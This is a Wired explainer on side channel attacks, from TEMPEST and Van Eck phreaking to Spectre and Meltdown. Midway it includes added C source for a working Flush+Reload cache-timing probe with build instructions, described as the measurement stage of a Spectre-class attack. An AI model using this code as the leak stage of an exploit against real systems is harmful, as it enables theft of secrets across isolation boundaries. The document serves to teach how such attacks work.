What Is a Side Channel Attack? [wired.com]:
on machines keeping secrets. But computers, like poker-playing humans, have tells. They flit their eyes when they've got a good hand, or raise an eyebrow when they're bluffing—or at least, the digital equivalent. And a hacker who learns to read those unintended signals can extract the secrets they contain, in what's known as a "side channel attack."
Side channel attacks take advantage of patterns in the information exhaust that computers constantly give off: the electric emissions from a computer's monitor or hard drive [wired.com], for instance, that emanate slightly differently depending on what information is crossing the screen or being read by the drive's magnetic head. Or the fact that computer components draw different amounts of power when carrying out certain processes [paulkocher.com]. Or that a keyboard's click-clacking can reveal a user's password [springer.com] through sound alone.
"Usually when we design an algorithm we think about inputs and outputs. We don’t think about anything else that happens when the program runs," says Daniel Genkin, a computer scientist at the University of Michigan and a leading researcher in side channel attacks. "But computers don’t run on paper, they run on physics. When you shift from paper to physics, there are all sorts of physical effects that computation has: Time, power, sound. A side channel exploits one of those effects to get more information and glean the secrets in the algorithm."
For a sufficiently clever hacker, practically any accidental information leakage can be harvested to learn something they're not supposed to. As computing gets more complicated over time, with components pushed to their physical limits and throwing off unintended information in all directions, side channel attacks are only becoming more plentiful and difficult to prevent. Look no further than the litany of bugs that Intel and AMD have struggled to patch over the last two years with names like Meltdown, Spectre [wired.com], Fallout, RIDL, or Zombieload [wired.com]—all of which used side channel attacks as part of their secret-stealing techniques.
The most basic form of a side channel attack might be best illustrated by a burglar opening a safe with a stethoscope pressed to its front panel. The thief slowly turns the dial, listening for the telltale clicks or resistance that might hint at the inner workings of the safe's gears and reveal its combination. The safe isn't meant to give the user any feedback other than the numbers on the dial and the yes-or-no answer of whether the safe unlocks and opens. But those tiny tactile and acoustic clues produced by the safe's mechanical physics are a side channel. The safecracker can sort through that accidental information to learn the combination.
One of the earliest and most notorious computer side channel attacks is what the National Security Agency called TEMPEST [wired.com]. In 1943 Bell Labs discovered that a teletype machine would cause a nearby oscilloscope's readings to move every time someone typed on it. This, the Bell Labs researchers quickly realized, was a problem. The teletype machine was meant to allow secure, encrypted communications, but anyone close enough to read its electromagnetic emissions could potentially decipher its secrets. The phenomenon wouldn't be fully documented in public until 1985, when a computer researcher named Wim van Eck published a paper on what would come to be known as "Van Eck Phreaking," reconstructing the images on a computer screen with long-distance detection of the electrical signals it discharges.
Similar electromagnetic leakage attacks have been refined ever since. As recently as 2015, one group of researchers at Tel Aviv University created a $300 gadget that fits in a piece of pita bread [wired.com] and can derive the encryption keys on a nearby laptop's hard drive by picking up its electrical emissions. Other techniques have proven that sound, power usage, or even just the timing patterns in communications can reveal a computer's secrets. The same Tel Aviv University team also found that a microphone picking up the sounds of a computer [tau.ac.il] as it performs decryption can reveal its secret keys, and that patterns in the bursts of encrypted data sent to a web browser can reveal what Netflix or YouTube video someone is watching [github.io], with no access to their computer.
Computers aren't the only targets of side channel attacks, points out Ben Nassi, a security researcher at Ben Gurion University. The target can be any secret process or communication that produces unintended but meaningful signals. Nassi points to eavesdropping methods like using the gyroscopes in a hacked smartphone as microphones [stanford.edu] to pick up the sounds in a room, or a technique known as "visual microphone [mit.edu]" that uses long-distance video of an object—say, a bag of chips or the leaves of a houseplant—to observe vibrations that reveal a conversation that happened nearby.
Nassi himself, along with a group of researchers at Ben Gurion, revealed a technique last week that can eavesdrop on conversations in a room in real time by using a telescope to observe the vibrations of a hanging lightbulb inside [wired.com]. "I'd call it a side effect," Nassi says of this broader definition of side channels that goes beyond computers or even machines. "It's a method to compromise confidentiality by analyzing the side effects of a digital or physical process."
And computer-focused side channel attacks have only become more sophisticated. Spectre, Meltdown, and a series of other "microarchitectural" vulnerabilities that affect microprocessors, for instance, all rely on a timing side channel. Each uses a different trick to get the processor to transiently access secret data and then leave a trace of it in the cache, the small, fast memory that keeps recently used data close to the core for speed. The attacker then loads a set of addresses of their own and times each load: a fast load means that address was already in the cache, a slow one means it was not. Those timing differences reveal which address the transient access touched, and with it the secret. (Some researchers consider this a "covert channel" rather than a side channel, since the attacker is essentially planting the information that they will later leak, but official bodies like the Cybersecurity and Infrastructure Security Agency describe Meltdown and Spectre as side-channel attacks [us-cert.gov], as do the creators of the attacks on their website [meltdownattack.com].)
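The flush-then-time step described above is usually called Flush+Reload, and the following is an added example of it written for this page; it is not code from the article or from the Spectre and Meltdown authors. It assumes an x86-64 Linux machine with GCC or Clang (it relies on `clflush` and `rdtscp`), and the victim routine, the secret byte and the 256-slot probe array are all constructed here for illustration. The "victim" uses a secret byte only as an array index; the "attacker" never reads the secret, only how long each of its own probe lines takes to load afterward.

```c
// Added example (not from the article): Flush+Reload cache-timing probe, x86-64 only.
// The victim touches one of 256 probe lines chosen by a secret byte. The attacker
// flushes every line first, lets the victim run, then reloads each line and treats
// a fast reload as "this line was in the cache", which identifies the secret.
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   // _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp

#define STRIDE 4096      // one probe slot per page, so no two slots share a cache line
#define SLOTS  256       // one slot per possible value of the secret byte
#define ROUNDS 64        // repeat and vote, because single timings are noisy

static uint8_t probe[SLOTS * STRIDE] __attribute__((aligned(4096)));
static uint8_t victim_secret;     // the value the attacker is not supposed to learn

// Touch every slot once so each page is backed by its own physical page; otherwise
// untouched BSS pages all alias the kernel's shared zero page and the signal vanishes.
static void init_probe(void) {
    for (int i = 0; i < SLOTS; i++) probe[i * STRIDE] = 1;
}

// Victim: uses the secret only as an array index. The data it reads is irrelevant;
// what matters is that the line for slot `victim_secret` is now in the cache.
static void victim_run(void) {
    (void)*(volatile uint8_t *)&probe[victim_secret * STRIDE];
}

// Attacker step 1: evict every probe line from all cache levels.
static void flush_probe(void) {
    for (int i = 0; i < SLOTS; i++) _mm_clflush(&probe[i * STRIDE]);
    _mm_mfence();
}

// Attacker step 2: time a single load. Fences keep the load inside the timed window.
static uint64_t time_load(const volatile uint8_t *p) {
    unsigned aux;
    _mm_mfence();
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    return t1 - t0;
}

// Measure this machine's own hit and miss latencies and split the difference,
// rather than hard-coding a cycle count that only holds on one microarchitecture.
static uint64_t calibrate_threshold(void) {
    const volatile uint8_t *p = &probe[0];
    uint64_t hit = 0, miss = 0;
    for (int i = 0; i < 100; i++) {
        (void)*p;                          // warm the line
        hit += time_load(p);               // cached
        _mm_clflush((const void *)p);
        _mm_mfence();
        miss += time_load(p);              // served from DRAM
    }
    return (hit / 100 + miss / 100) / 2;
}

// Attacker step 3: flush, let the victim run, reload every slot, and vote for the
// slot that came back fast. The attacker never reads victim_secret itself.
static int recover_byte(uint64_t threshold) {
    int votes[SLOTS] = {0};
    for (int r = 0; r < ROUNDS; r++) {
        flush_probe();
        victim_run();
        for (int i = 0; i < SLOTS; i++) {
            int slot = (i * 167 + 13) & (SLOTS - 1);   // scrambled order defeats the stride prefetcher
            if (time_load(&probe[slot * STRIDE]) < threshold) votes[slot]++;
        }
    }
    int best = 0;
    for (int i = 1; i < SLOTS; i++) if (votes[i] > votes[best]) best = i;
    return best;
}

// Plant a secret in the victim, run the attack, and return what the cache gave away.
int demo_leak(uint8_t secret) {
    init_probe();
    victim_secret = secret;
    uint64_t threshold = calibrate_threshold();
    return recover_byte(threshold);
}

int main(void) {
    int got = demo_leak(0x2A);
    printf("victim secret 0x2a, recovered 0x%02x via cache timing\n", got);
    return got == 0x2A ? 0 : 1;
}
```

Build with `gcc -O2 -o flush_reload flush_reload.c` and run it on bare metal or a VM that passes `rdtscp` through. In a Spectre-class attack the `victim_run` step is replaced by a mispredicted branch or a faulting load that the processor executes transiently; the measurement side is the same, which is why mitigations aim either at stopping the transient access or at making the secret-dependent cache footprint unobservable (flushing or partitioning the cache, coarsening timers). The calibrated threshold and the majority vote are there because a single timing is noise; a noisy VM shrinks the margin but rarely erases it.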
Attacks like Spectre and Meltdown left Intel and other chipmakers in a cat-and-mouse game, chasing their products' accidental information leaks and constantly releasing updates that hide the exposed data or pad it with noise that makes it harder to decipher. As computers grow more complex, and if the computing industry continues to prioritize performance over security, side channels will keep appearing, says Michigan's Genkin. In some cases, like Spectre and Meltdown, researchers are digging into years-old mechanisms and pulling out secrets that were available for the taking all along, at least for anyone who could decipher the accidental byproducts of a computer's processes.
"They were always there," says Genkin. "The reason you hear more and more about them is that as we dig further, we find more and more side channels to exploit. And as we find out just how bad they are, we are also learning how to defend against them."